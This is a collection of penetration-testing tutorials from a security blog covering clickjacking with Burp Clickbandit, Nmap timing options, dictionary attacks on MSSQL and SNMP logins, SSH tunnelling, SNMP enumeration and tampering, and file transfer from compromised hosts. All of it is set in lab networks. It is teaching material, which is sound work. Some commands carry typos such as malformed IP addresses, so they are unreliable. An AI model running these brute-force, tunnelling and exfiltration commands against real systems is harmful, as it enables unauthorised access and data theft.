We made a simple change in the URL we replaced login.php with portal.php as shown in the image.

This has successfully logged us into Bwapp Lab without giving any login details.

Burp Clickbandit

Burp Clickbandit option in burp suite is a tool used for generating clickjacking attacks. When you know a web page that is vulnerable to clickjacking, we can use Burp Clickbandit to create an attack, and to confirm the vulnerability can be successfully exploited. When running Burp Clickbandit on untrusted websites. Malicious JavaScript from the target site can take the authority of the HTML output that is generated by Burp Clickbandit. There are two modes in Burp Clickbandit as follows:

Record Mode

Burp Clickbandit first opens in record mode. Then we need to perform one or more mouse clicks to record your clickjacking attack, as this will involve performing the mouse clicks that the victim user needs to perform for making some desired action. We can also use the “disable click actions” checkbox to record clicks without the target page handling them. When you have finished recording, click the “Finish” button to enter review mode.

Review Mode

When you have finished recording your clickjacking attack, Burp Clickbandit enters into review mode. This lets you review the generated attack, with the attack user interface over the original page UI. You can click the buttons on the attack UI to verify that the attack works.

List of commands that are available in review mode:

• + And – buttons are used to zoom in and out.
• The “toggle transparency” button allows you to show or hide the original page UI.
• The “reset” button restores the generated attack, as it was before any further clicks were made.
• The “save” button is used to save an HTML file containing the attack. This can be used as a real-world exploit as clickjacking vulnerability.
• You can use the keyboard arrow keys to reposition the attack UI over the original page UI, if not correctly aligned with the original page UI.

Let’s start!!

Burp Clickbandit runs on browser using JavaScript. It can work on all latest browsers except for Microsoft IE and Edge.

To run Clickbandit, go to the Burp menu and select “Burp Clickbandit”.

Click the “Copy Clickbandit to clipboard” button. This will copy the Clickbandit script to your clipboard.

In your browser, visit the web page that you want to test, in the same way we regularly do. Then in your browser, open the web developer console. This might also be called “developer tools” or “JavaScript console”. Paste the Clickbandit script by editing allow pasting before pasting copied code into the web developer console, and press enter.

The Burp Clickbandit Logo will appear at the top of the browser window and the original page will be loaded with in the frame which ready for the attack to be performed, this is said to be the record mode of burp clickbandit. Then we need to perform one or more mouse clicks to record your clickjacking attack, as this will involve performing the mouse clicks that the victim user needs to perform for making some desired action. We can also use the “disable click actions” checkbox to record clicks without the target page handling them. When you have finished recording, click the “Finish” button to enter review mode.

When you have finished recording your clickjacking attack, Burp Clickbandit enters into review mode. This lets you review the generated attack, with the attack user interface over the original page UI.

Click on Save Button, allows you to save an html file containing the attack. This can be used as a real-world exploit as clickjacking vulnerability.

We have opened the saved html file which shows a transparent UI we have created over the original UI with a click button in the red box appearing on the page.

We can click the buttons on the attack UI to verify that the attack works. A message will appear the, you’ve been Clickjacked as shown in the image.

Author: Ashray Gupta is a Researcher and Technical Writer at Hacking Articles. He is a certified ethical hacker, web penetration tester and a researcher in nanotechnology. Contact Here

The post Advance Web Application Testing using Burpsuite appeared first on Hacking Articles.

Hello everyone, in this article we will have a look at the different parameters that are used together to make a timing template and how to use those parameters individually according to will.

Let’s Start!!

Nmap timing template

As we have seen that Nmap has multiple timing templates that can be used for differently as according to the requirement. Click here to check the timing scan article. Let’s see what’s inside the timing template. For getting the description of timing template we’ll use -dattribute.

nmap –T4 –d -p21-25 192.168.1.139

Here we have multiple arguments that collectively make a timing template. Let’s have a look at them one by one.

• Host-groups
• Rtt-timeouts
• Scan-delay
• Max-retires
• Min-rates
• Parallelism

Maximum Retries (–max-retries)

–max-retries specifies the number of times a packet is to be resent on a port to check if it is open or closed. If –max-retries is set to 0, the packets will be sent only once on a port and no retries will be done.

nmap -p21-25 192.168..1.139 –max-retries 0

Here in wireshark, we can see that 1-1 TCP SYN packet sent to each port from source: 192.168.1.126 to destination: 192.168.1.139 are not sent again.

Now we will apply a small firewall rule on the target machine so that the packets get blocked if they come at a faster rate.

sudo iptables -I INPUT -p tcp -m state –state NEW –m recent –set

sudo iptables -I INPUT -p tcp -m state –state NEW –m recent –update –seconds 1 –hitcount 1 -j DROP

Now, the normal scan will not show any results with max-retries

nmap -p21-25 192.168..1.139 –max-retries 0

As we can see that the ports whose packets got dropped are not sent again so their status is not determined.

here we can increase the max-retries value which will bypass the specified firewall filter so that we can get the exact port status.

nmap -p21-25 192.168..1.139 –max-retries 5

Here we can see that TCP SYN packets sent to one port from source: 192.168.1.126 to destination: 192.168.1.139 are sent again and again until the packets return a specified reply or the maximum retry value (here 5) is reached.

Host-timeout

The –host-timeout is an attribute that specifies the scan to give up on a host after the specified time. The lesser the time specified the more are the chances of inaccuracy in scan results.

We can specify time in milliseconds (ms), seconds (s), minutes (m)

nmap -p21-25 192.168.1.139 –host-timeout 10ms

Now we will try to get the result by increasing the timeout value

nmap-p21-25 192.168.1.139–host-timeout 100ms

We can use –host-timeout in other scenarios also like when we need to check if the host system is live or not. Here we have shown how the host-timeout can affect the results of a ping scan.

nmap -sp 192.168.1.139 –host-timeout 10ms

Output from above command had given 0 host is up.

nmap -sp 192.168.1.139–host-timeout 100ms

Output from above command had given 1 host is up.

Hostgroup

hostgroup attribute is specified to scan a specified number of hosts in network at a time. You need to specify minimum number of hosts or maximum number of hosts or both to be scaned at a time

nmap –sP 192.168.1.1/24 –min-hostgroup 3 –max-hostgroup 3

From given below image you can observed that it has shown only 3 live host from inside complete subnet mask and save your time from scanning complete network.

Scan delay

Scan delay is used to delay the packet to be sent by the specified time. It is very useful in evading time based firewalls.

nmap –p21-25 192.168.1.139 –scan-delay 11s

here we can see the time difference in between the packets

packet 1: TCP SYN packet on port 25 at 07:58:01 from 192.168.1.126 to 192.168.1.139

packet 2: TCP SYN packet on port 22 at 07:58:12 from 192.168.1.126 to 192.168.1.139

Now if you will count the time difference between these packets you get 11 sec time laps between these two packets.

Maximum rate (max-rate)

Rate is an attribute that specifies at what rate is the packets are to be sent, in other words number of packets to be sent at a time. Max-rate specifies maximum number of packets to be sent at once.

nmap -p21-25 192.168.1.139 –max-rate 2

wireshark shows that the packets sending rate is less than 2, means number of packets sent at a time is less than or equal to 2

packet 1: TCP SYN packet on port 21 at 03:17:20 from 192.168.1.126 to 192.168.1.139

packet 2: TCP SYN packet on port 23 at 03:17:21 from 192.168.1.126 to 192.168.1.139

Now if you will count the time difference between these packets you get 1 sec time laps between these two packets indicating that these two packets were not sent together.

Minimum rate (mini-rate)

Min-rate specifies maximum number of packets to be sent at once. Here if we want atleat 2 packet must be sent on target’s network at same time not less then this, then need to execute below command.

nmap -p21-25 192.168.1.139 –min-rate 2

wireshark shows that the packets sending rate is greater than 2, means number of packets sent at a time is equal to or greater than 2

packet 1: TCP SYN packet on port 23 at 03:28:29 from 192.168.1.126 to 192.168.1.139

packet 2: TCP SYN packet on port 22 at 03:28:29 from 192.168.1.126 to 192.168.1.139

Now if you will count the time difference between these packets you get only a fraction of second as time laps between these two packets indicating that these two packets were sent together.

Parallelism

Parallelism attribute is used to send multiple packets in parallel, min-parallelism means that the number of packets to be sent in parallel is to be greater than the value specified and max-parallelism means that the number of packets to be sent in parallel is to be less than or equal to the value specified

nmap -p21-25 192.168.1.139 –min-parallelism 2 –max-parallelism 2

In wireshark we can see the couple of TCP-SYN packetssent in parallel from 192.168.1.126 which is neither less nor greater than 2.

Round trip timeout

Rtt timeout is the time specified for a packet to return a reply, min-rtt-timeout specifies the minimum value of time that is to be taken by a packet to return a reply

nmap -p21-25 192.168.1.139–min-rtt-timeout 5ms

wireshark shows that the packet and its reply takes time greater than the min-rtt-timeout specified

packet 1: TCP SYN packet on port 25 at 08:10:53.232666116 from 192.168.1.126 to 192.168.1.139

packet 2: SYN ACK packet from port 25 at 08:10:53.233466679 from 192.168.1.139 to 192.168.1.126

Max-rtt-timeout

max-rtt-timeout specifies the maximum value of time that is to be taken by a packet to return a reply

nmap -p21-25 192.168.1.139–max-rtt-timeout 50ms

wireshark shows that the packet and its reply takes time lesser than the max-rtt-timeout

packet 1: TCP SYN packet on port 22 at 08:15:08.171777907 from 192.168.1.126 to 192.168.1.139

packet 2: SYN ACK packet from port 22 at 08:15:08.173117154 from 192.168.1.139 to 192.168.1.126

Intial Round trip timeout

Initial-rtt-timeout specifies the initial value of time to be taken by a packet to return a reply, the return time can be greater or lesser than the  initial-rtt-timeout because of the max-rtt-timeout and min-rtt-timeout specifeies the range of time for a packet to return a reply but the packet attempts to return a reply in the time specified in initial-rtt-timeout

nmap -p21-25 192.168.1.139–initial-rtt-timeout 15ms

wireshark shows that the time taken by packet to return reply is around same as specified in initial-rtt-timeout

packet 1: TCP SYN packet on port 23 at 08:18:45.342395520 from 192.168.1.126 to 192.168.1.139

packet 2: SYN ACK packet from port 23 at 08:18:45.342930962 from 192.168.1.139 to 192.168.1.126

Auhtor:  Deepanshu is a Certified Ethical Hacker and a budding Security researcher. Contact here.

The post Nmap Scan with Timing Parameters appeared first on Hacking Articles.

In this article, we will learn how to gain control over our victim’s PC through 1433 Port use for MSSQL service. There are various ways to do it and let take time and learn all those because different circumstances call for different measure.

Let’s start!!

Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, vnc, http, https, smb, several databases, and much more

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

 hydra -L/root/Desktop/user.txt 1433 –P /root/Desktop/pass.txt 16 192.168.1.128 mssql

-P:  denotes path for password list

-L: denotes path of username text file (sa is default user of Mssql)

Once the commands are executed it will start applying the dictionary attack and so you will have the right password in no time. As you can observe that we had successfully grabbed the MSSQL password as apple@123456

Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, MSSQL, HTTP, IMAP, rlogin, SSH, Subversion, and MSSQL to name a few

Run the following command

medusa -h 192.168.1.128 –u /root/Desktop/user.txt –P /root/Desktop/pass.txt –M Mssql

Here

-u: denotes username (sa is default user of Mssql)

-P:  denotes path for password list

As you can observe that we had successfully grabbed the MSSQL password as apple@123456.

 xHydra 

This is the graphical version to apply dictionary attack via 1433 port to hack a system. For this method to work:

Enter xHydra in your kali Linux terminal. And select Single Target option and their give the IP of your victim PC. And select MSSQL in box against Protocol option and give the port number 1433 against the port option.

Now, go to Passwords tab and select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.

After doing this, go to Start tab and click on Start button on the left.

Now, the process of dictionary attack will start. Thus, you will attain the username:sa and password of your victim.

Metasploit

This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).

use auxiliary/scanner/mssql/mssql_login

msf auxiliary(scanner/mssql/mssql_login) > set rhosts 192.168.1.128

msf auxiliary(scanner/mssql/mssql_login) > set pass_file /root/Desktop/user.txt

msf auxiliary(scanner/mssql/mssql_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(scanner/mssql/mssql_login) > set stop_on_success true

msf auxiliary(scanner/mssql/mssql_login) > run

Awesome!! From given below image you can observe the same password: apple@123456 have been found by metasploit.

Nmap

Given below command will attempt to determine username and password through brute force attack against MS-SQL by means of username and password dictionary.

nmap -p 1433 –script ms-sql-brute –script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.128

In specfied image you can observe that we had successfully retrieve credential for usersUsername: sa and password: apple@123456

Author: Rahul Virmani is a Certified Ethical Hacker and the researcher in the field of network Penetration Testing (CYBER SECURITY).   Contact Here

The post 4 ways to Hack MS SQL Login Password appeared first on Hacking Articles.

Basically tunnelling is process which allows data sharing or communication between two different networks privately. Tunnelling is normally perform through encapsulating the private network data and protocol information inside the public network broadcast units so that the private network protocol information visible to the public network as data. 

SSH Tunnel:  Tunneling is the concept to encapsulate the network protocol to another protocol here we put into SSH, so all network communication are encrypted. Because tunneling involves repackaging the traffic data into a different form, perhaps with encryption as standard, a third use is to hide the nature of the traffic that is run through the tunnels.

Types of SSH Tunneling:     

1. Dynamic SSH tunneling
2. Local SSH tunneling
3. Remote SSH tunneling

Let’s Begin!!

Objective:  To establish SSH connection between remote PC and local system of different network.

Here I have set my own lab which consist three systems in following network:

SSH server (two Ethernet interface) 

IP 192.168.1.104 connected with remote system

IP 192.168.10.1 connected to local network system 192.168.10.2

SSH client (local network) holds IP 192.168.10.2

Remote system (outside network)

In following image we are trying to explain SSH tunneling process where a remote PC is trying to connect to 192.168.10.2 which is on INTRANET of another network. To establish connection with SSH client (raj), remote PC will create SSH tunnel which will connect with the local system via SSH server (Ignite).

NOTE: Service SSH must be activated

Given below image is describing the network configuration for SSH server where it is showing two IP 192.168.1.104 and another 192.168.10.1

Another image given below is describing network configuration for SSH client which is showing IP 192.168.10.2

Dynamic SSH Tunneling through Windows

Remote Pc is trying to connect to SSH server (192.168.1.104) via port 22 and get successful login inside server. Here we had used putty for establishing connection between SSH server (Ubuntu) and remote user (Windows).

Similarly now Remote PC trying to connect with Client PC (192.168.10.2) via port 22, since they belongs to different network therefore he receive network error.

Step for Dynamic SSH tunneling

• Choose option SSH >Tunnel given in the left column of category.
• Give new port forwarded as 7000 and connection type as dynamic and click on ADD at last.

Now connect to SSH server 192.168.1.104 via port 22 and then click on open when all things get set.

First it will connect to SSH server as you can see we are connected with SSH server (Ignite).

Now login into putty again and give IP of client system as Host Name 192.168.10.2 and Port 22 for SSH then click on open.

Open previous running window of putty choose Proxy option from category and follow given below step:

• Select proxy type as SOCKS 5
• Give proxy hostname as 127.0.0.1 and port 7000
• Click on open to establish connection.

Awesome!! We have successfully access SSH client (raj) via port 7000

Dynamic SSH Tunneling through Kali Linux on Port 80

Now we are employing Kali Linux for SSH tunneling and demonstrating how an attacker or Linux user can take privilege of Tunneling and can established SSH connection with client systems.

 ssh -D 7000 ignite@192.168.1.104

Enter user’s password for login and get access of SSH server as shown below.

Next we need to set network proxy for enabling socksv5 and for that follow below steps.

• In your web browser “Firefox” go to option for general setting tab and open Network Proxy.
• Choose No Proxy
• Enable socksv5

Add localhost, 127.0.0.1 as Manual proxy

So from given below image you can perceive that now we able to connect with client: 192.168.10.2 via port 80.

Dynamic SSH Tunneling through Kali Linux on Port 22

Now connect to client machine through given below command:

ssh -D 7000 ignite@192.168.1.104

Install tsocks through apt repository using command: apt install tsocks.

tsocks – Library for intercepting outgoing network connections and redirecting them through a SOCKS server. 

Open the tsocks.conf file for editing socks server IP and port, in our case we need to mention below two lines and then save it.

Server = 127.0.0.1

Server_port = 7000

Now connect to SSH client with the help tsocks using given below command.

tscoks ssh raj@192.168.10.2

Enter the password and enjoy the access of SSH client.

Local SSH Tunneling through Windows

Local tunneling is a process to access a specific SSH client machine for communication. It let you establish the connection on a specific machine which is not connected from internet.

The only difference between dynamic tunnelling and local tunnelling is that, dynamic tunnelling requires socks proxy for tunnelling all TCP traffic and local tunnelling only required destination IP address.

Step for SSH Local tunneling

• Use putty to connect SSH server (192.168.1.104) via port 22 and choose option SSH >Tunnelgiven in the left column of category.

• Give new port forwarded as7000 and connection type as local 
• Destination address as 198.168.10.2:22 for establishing connection with specific client and click on ADD at last.
• Click on open when all things get set.

First this will establish connection between remote pc and SSH server.

Open new window of putty and follow given below step:

• Give hostname as localhost and port 7000 and connection type SSH.
• Click on open to establish connection.

Awesome!! We have successfully access SSH client via port 7000 

Local SSH Tunneling through Kali Linux

Now again we switch into Kali Linux for local tunneling which is quite easy as compare to dynamic. Execute given below command for forwarding port to local machine.

ssh -L 7000:192.168.10.2:22 ignite@192.168.1.104  

Now open a new terminal and type below command for connecting to SSH client.

ssh raj@127.0.0.1 -p 7000

Awesome!! We have successfully access SSH client via port 7000 

Remote SSH Tunneling through Putty

Remote tunneling is functional when a client machine wants to access a remote system which is outward from its network.

First need to install putty in our SSH server (ignite) and then follow given steps.

Step for remote tunneling

• Enter remote system IP 192.168.1.108
• Mention port 22
• Go to SSH>tunnel options

• Give new port forwarded as7000 and connection type as Remote
• Destination address as 198.168.10.2:22for establishing connection with specific client and click on ADD at last.
• Click on openwhen all things get set.

Now server will get connected to Remote system as shown in below image.

Come back to remote system and enter following command to with SSH client machine.

ssh raj@127.0.0.1 -p 7000

From given below image you can observed that we had successfully connected with SSH client machine via port 7000.

Remote SSH Tunneling through Ubuntu

If you are not willing to use putty for remote tunneling then you can execute following command

ssh -R 7000:192.168.10.2:22 root@192.168.1.108

Here 192.168.1.10.2 is our local client (raj) IP and 192.168.1.108 is our remote system IP.

Come back to remote system and enter following command to with SSH client machine.

ssh raj@127.0.0.1 -p 7000

From given below image you can observed that we had successfully connected with SSH client machine via port 7000.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post Comprehensive Guide to SSH Tunnelling appeared first on Hacking Articles.

In this article, we will learn how to gain control over our victim’s SNMP service. There are various ways to do it and let take time and learn all those because different circumstances call for different measure.

Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

hydra -P /root/Desktop/pass.txt 192.168.1.125 snmp

-P:  denotes path for password list

Once the commands are executed it will start applying the dictionary attack and so you will have the right username and password in no time. As you can observe that we had successfully grabbed the SNMP password as ignite123.

xHydra

This is the graphical version to apply dictionary attack via SNMP port to hack a system. For this method to work:

Open xHydra in your kali. And select Single Target option and their give the IP of your victim PC. And select SNMP in box against Protocol option and give the port number 161 against the port option.

Now, go to Passwords tab and in Username section check the box adjacent to Protocol doesn’t require username.

Then select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.

Now go to the specific Tab and in the SNMP and clear the data written in the text box below the SNMP as shown in the given screenshot.

When you will clear all entries it will look like as shown in next image given below.

After doing this, go to Start tab and click on Start button on the left.

Now, the process of dictionary attack will start. Thus, you will attain the password of your victim.

As you can see that we have the password ignite123 cracked.

Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, SNMP, and VNC to name a few

Run the following command

medusa -M snmp –h 192.168.1.125 –u ignite –P /root/Desktop/pass.txt 

 Here

-h: denotes host IP

-u: denote a particular user

But Brute forcing SNMP doesn’t require username but medusa doesn’t work without a proper syntax, you can use any username of your choice

–P:  denotes path for password list

As you can observe that we had successfully grabbed the SNMP password as ignite123.

Metasploit

This module will test SNMP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Open Kali terminal type msfconsole

Now type use auxiliary/scanner/snmp/snmp_login

msf auxiliary(scanner/snmp/snmp_login)> set rhosts 192.168.1.125 (IP of Remote Host)

msf auxiliary(scanner/snmp/snmp_login)> set pass_file  /root/Desktop/pass.txt

msf auxiliary(scanner/snmp/snmp_login)> set stop_on_success true

msf auxiliary(scanner/snmp/snmp_login)> run

 From given below image you can observe that we had successfully grabbed the SNMP password.

Nmap

We can also crack the snmp password using nmap, execute given below command.

nmap –sU –p 161 –n –script snmp-brute 192.168.1.125 –script-args snmp-brute.communitiesdb=/root/Desktop/pass.txt

As you can see above that we have the password cracked as ignite123.

Onesixtyone

Onesixtyone is an SNMP scanner that sends multiple SNMP requests to multiple IP addresses, trying different community strings and waiting for replies.

onesixtyone 192.168.1.125 –c /root/Desktop/pass.txt 

As you can see above that we have the password cracked as ignite123 using onesixtyone

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

The post 6 Ways to Hack SNMP Password appeared first on Hacking Articles.

What is SNMP?

Simple Network Management Protocol (SNMP) is a protocol for network management. It is used for collecting information from, and configuring, network devices, such as servers, printers, hubs, switches, and routers on an Internet Protocol (IP) network. It usually run on UDP port 161.

Download Vyos Link: https://downloads.vyos.io/?dir=release/1.1.8

Create New Virtual Machine using the VMware and change the Network Adapter to Bridged as shown in the given screenshot.

After completing the initial setup in the VMware Boot the Newly created Virtual Machine by clicking on the Power on the Virtual Machine.

The Default Login Credentials for Vyos are

Username: vyos

Password: vyos

The Initial Boot of Vyos will be as shown below:

This is a Live Boot of the vyos, so we will install the vyos to use it properly.

We will use the iso image to install vyos. Type the following command:

Command: install image

Enter “Yes” where it asks to continue.

Next it will ask about the partition management.

Enter “Auto” where it asks about Partition.

It will detect the drives in the Virtual System and ask you to select the particular drive in which you want to install vyos.

Enter “sda” where it asks about the location for installation.

Next it will ask about the size for the root partition for the vyos.

You can enter any size from 1000MB to 21474MB. But it is recommended to keep it maximum i.e. 21474MB.

Next it will ask about the name for the image.

By default the name is set to the version number that is 1.1.8. You can either give a personalised name or you can leave it default.

Next it will ask about the location to copy the sda.

It is recommended to keep it default.

After that it will ask for the password to be kept for the administrator account.

By default it is kept vyos. But from security point of view it is recommended to change it to something complex which is difficult to guess or brute force.

Now it will ask for the drive on which you want to setup GRUB Boot-loader? Again leave it default to “sda”.

After that we have completed the vyos setup. Reboot using the command

Command: reboot

After reboot it will ask for login credentials, Enter the credential that you entered during the installation.

Now we will configure the Network Interface. To do that, we will have to enter configuration mode.

Command: configure

After entering into configuration mode set up Network interface

Syntax: set interface ethernet [network interface] address [Static IPv4 Address]

Command: set interface ethernet eth0 address 192.168.1.125/24

Now Commit and Save the Configuration

Command: commit

Command: save

After that type “exit” to get out of configuration mode and then reboot the machine using “reboot” command

We are rebooting because the configuration changes come in effect only after a reboot.

You can the view interface which we configured by using the command

Command: show interfaces

Note: Above command will run in configuration mode.

Start SNMP service

Now we will set up the snmp service in the Vyos.

For that we will enter configuration mode using command

Command: configure

Now to set up a snmp service we will need to add a community string and give it an authorization. To do that:

Syntax: set service snmp community [community-string] authorization [auth-mode]

[community-string]: It can be anything but normally it is either public or private. But from a security point of view it is recommended to keep it that cannot be easily guessed or bruteforced.

[auth-mode]: It is the Authorization Mode. We have two options

1. [ro]: Read Only Authorization (It can only be used to read or extract data, we can change it using this string)
2. [rw]: Read Write Authorization (It can be used to change the data using the string)

Command: set service snmp community ignite123 authorization ro

Command: set service snmp community ignite123 authorization rw

Now let’s set a user for the system.

Firstly Enter the Configuration Mode.

Command: configure

Now to add a user we will use the following command,

Syntax: set system login user [username] authentication plaintext-password [password]

Command: set system login user ignite authentication plaintext-password ignite123

After this commit the configuration and save it. Also reboot the machine so that changes may take effect.

We have successfully completed snmp Lab in Vyos.

SNMP Enumeration using Kali Linux

Now that we have setup a snmp service let’s pentest it through kali linux inbuilt tools one by one, where We can read and extract information using the community string that have the authorization of reading only but to change the information we will have to use the community string with the read and write authorization.

Nmap

Let’s check using nmap in Kali Linux Machine which is running on the same network.

nmap –sU –p161, 162 192.168.1.125

[-sU]: UDP Ports as SNMP service runs on UDP port

[-p]: Specify Port Number; SNMP service runs on port 161 and 162

From given below image you can observed that it has also shown port 161 is open.

Snmpwalk

snmpwalk is an SNMP application that uses SNMP GETNEXT requests to query a network entity for a tree of information.

Command: snmpwalk -v1 –c ignite321 192.168.1.125

Here

[-v1]: Level of verbose mode

[-c]: Community String

From given below image you can observe all details that are specified for “STRING”

Snmpwalk

We can manipulate these details using the iso id, using another tool snmpset. Here we are renaming the host string from vyos to hacked

Command: snmpset –v1 –c ignite321 192.168.1.125 iso.3.6.1.2.1.1.5.0.s Hacked

Let’s check if the changes we implemented had an effect using snmpwalk

Command: snmpwalk –v1 –c ignite321 192.168.1.125

As you can see that the we have successfully change the host name from vyos to hacked.

We can extract a number of information using snmpwalk

Command: snmpwalk –v1 –c ignite321 192.168.1.125 1.3.6.1.2.1.25.4.2.1.2

Command: snmpwalk –v1 -c ignite321 192.168.1.125 1.3.6.1.2.1.6.13.1.3

Command: snmpwalk –v1 –c ignite321 192.168.1.125 1.3.6.1.2.1.25.6.3.1.2

As the data extracted by snmp walk is quite large we can extract that into a text file by using command below

Command: snmpwalk –v1 -c ignite321 192.168.1.125 > snmpout.txt

We can use gedit to view the extracted information

Command: gedit snmpout.txt 

SNMP-Check

Like to snmpwalk, snmp-check allows you to enumerate the SNMP devices and places the output in a very human readable friendly format. It could be useful for penetration testing or systems monitoring.

Command: snmp-check 192.168.1.125 -p 161 -c ignite123

Here,

[-p]: To specify port

[-c]: To specify Community String

Braa

Braa is a mass snmp scanner. The intended usage of such a tool is of course making SNMP queries – but unlike snmpwalk from net-snmp, it is able to query dozens or hundreds of hosts simultaneously, and in a single process. Thus, it consumes very few system resources and does the scanning VERY fast.

Braa implements its OWN snmp stack, so it does NOT need any SNMP libraries like net-snmp.

Syntax: braa [Community-string]@[IP of SNMP server]:[iso id]

Command: braa ignite123@192.168.1.125:.1.3.6.*

Metasploit

We can enumerate SNMP using a Metasploit module called snmp_enum.

use auxiliary/scanner/snmp/snmp_enum

msf auxiliary(scanner/snmp/snmp_enum) > set rhosts 192.168.1.125

msf auxiliary(scanner/snmp/snmp_enum) > set community ignite123

msf auxiliary(scanner/snmp/snmp_enum) > run

We have fetched same result from metasploit as above.

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

The post SNMP Lab Setup and Penetration Testing appeared first on Hacking Articles.

In penetration testing, generally we get stuck when we transfer or download any file from compromised machine or other host machine in a network. Therefore today you will learn which method you should follow for downloading any file from compromised or other host system. All following methods are helpfully in penetration testing and also used for general purpose.

Lets starts!!

File transfer Protocol (FTP)

You all are familiar with the working of FTP server their let’s start today’s tutorial from FTP service.

When you found port 21 is open, it means FTP service is running on remote machine and you are actively looking for downloading a text file from destination machine then you can follow below 2 methods.

1^st method use command-line

First connect to ftp server using host IP, enter login credential and then execute get command with file name you want to download.

ftp 192.168.1.106

get raj.txt

2^nd method use Browser

Same job can be executed using browser by adding host IP in URL as ftp://192.168.1.106, enter username and password for authentication and download your file.

Install Python FTP server

Generally many people preferred vsftpd server for FTP service for sharing file over port 21 as done above but if you are not compatible with vsftpd then you can go with 2^nd option “Python FTP server” that will allows sharing of file through port 21.

sudo apt-get install python-pyftpdlib

Here I want to give access of only a particular folder “aarti” for sharing its data.

sudo python -m pyftpdlib -p 21

So when the host machine will enter destination address in URL “ftp://192.168.1.103” and you will get anonymous login, now download the file.

Hypertext Transfer Protocol (HTTP)

Sharing file through web directory “html”

Another most well-known service for file transfer is HTTP service which uses port 80. Service apache should be activated in your machine for transferring file through web directories and after then you can move any file in to HTML directory for sharing it through http service.

So here we are transferring putty.exe file into html through following command.

cp putty.exe /var/www/html

Now let’s download putty.exe in our machine from destination server. Open your favorite browser and browse file through server address 192.168.1.106/putty.exe in URL. By applying this technique you can access any file from inside web directory i.e. /var/www/html of destination machine.

Sharing through Python Http server

If you are not compatible with above http method then you choose 2^nd option “Simple Http server” which also a python script that use port 80 for sharing file in a network through web browser.

Here again I want to give access of only a particular folder “demo” for sharing its data.

python -m SimpleHTTPServer 80

So when the host machine will enter destination address in URL “http://192.168.1.108” and you will get access for shared folder, now download the file.

HFS Tool

In above Http file sharing method we had use Ubuntu and Linux for transferring a file over port 80 and allowed other host machine to download it through web browser.

Now if you are a windows user then you can use HTS tool for performing same job. It is most popular tool used file transfer between different platforms.

Steps:

• Download the HFS and run the application
• Now drag and drop the file you want share through web browser.

Now when user of other host machine will open Windows IP as URL http://192.168.1.105 in his web browser he can download the shred file.

Netcat

Netcat is known as Swiss knife which is use for multiple purpose therefore we are going to use it in file transferring.

Use following command for downloading shared file from destination server

Syntax: nc [options] [listening port] > [path to store downloaded file]

nc -lvp 5555 > /root/Desktop/raj.txt

Type following command for sharing any file to host machine in the network.

Syntax: nc host IP host port < file.txt

nc 192.168.1.108 5555 < raj.txt

Now you can observe that we have successfully downloaded raj.txt file at the desktop of our host machine.

Curl

Curl command-line tool for transferring data using various protocols. And is also use for download the data from any website or host machine, following command will download putty.exe file from website.

curl -O http://192.168.1.106/putty.exe

Similarly execute given below command for downloading putty WWW.

curl -O https://the.earth.li/~sgtatham/putty/latest/putty.exe

Wget

Execute given below command for downloading particular file. The downloaded file stores in a current directory. It give indication of download progress, size, date and time though downloading the file.

Enter given below command for downloading any file from html directory of apache server.

wget http://192.168.1.106/putty.exe

Similarly execute given below command for downloading putty WWW.

wget https://the.earth.li/~sgtatham/putty/latest/putty.exe

Trivial File Transfer Protocol (TFTP)

TFTP service was used to read and write any file using a remote connection, it used UDP port 69 for sharing file and do not uses  authentication hence it is less secure than FTP.

Here I had created a demo.txt file inside tftp folder for sharing.

Metasploit contain a module that provides tftp service for file sharing.

use auxiliary/server/tftp

msf auxiliary(server/tftp) > set srvhost 192.168.1.108

msf auxiliary(server/tftp) > set TFTPROOT /root/tftp

msf auxiliary(server/tftp) > exploit

Now open command prompt and execute given below command for downloading demo.txt file in you system.

Syntax: tftp -i host IP GET file name.txt

tftp -i 192.168.1.108 GET demo.txt

As you can observe from given below image it has store downloaded in current directory.

SMB Server using Python script

Now we will use a python script that activates SMB service in our Linux machine. You can visit to github for this python script.

I copied the python code from github and past it into a text file as smbserver.py in desktop folder. Now execute give below command for a share folder “raj”.

python smbserver.py raj/root/share

Downloading file from Linux SMB server in Windows Machine

Since we are aware of smb service which is running in host machine 192.168.1.108 and being using window platform we can access it share folder through Run command prompt.

Hence you can observe that we had successfully access folder “raj” and found two text file user and pass in it.

In this way we can use smb python script for sharing file between windows and Linux machine.

Downloading file from Linux SMB server in Ubuntu Machine

If you are an Ubuntu user then you can use smbclient service for accessing share folder of smb server.

apt-get install smbclient

Now execute given below command for accessing share folder of server.

smbclient -L 192.168.1.108

From given below image can observe it has shown share folder is “RAJ”

Now execute given below command for accessing share folder raj and download the data present inside it.

smbclient //192.168.1.1.108/raj

Since folder raj has two text file user.txt and pass.txt and we are going to download user.txt through below command.

get user.txt

Download file through Meterpreter

In penetration testing when we compromise target machine and own his meterpreter session using metasploit then inside meterpreter we can execute following command for downloading any file form victim’s machine.

Meterpreter> download raj.txt /root/Desktop

Use Cat command

Cat is very beautiful command and can perform remarkable job if you will use it wisely, suppose you found any text file in host machine and you are unable to download it then open that file through cat command.

For example: I want to know the text inside user.txt then I will execute following command then copy that text into a new text document and save it in our machine.

Download file using Window PowerShell

If you are windows user and have command shell access then you can choose PowerShell for downloading any web server file. Execute given below command in command prompt as administrator.

powershell

(new-object System.Net.WebClient).DownloadFile(‘http://192.168.1.1.106/putty.exe’,’d:\data\putty.exe)

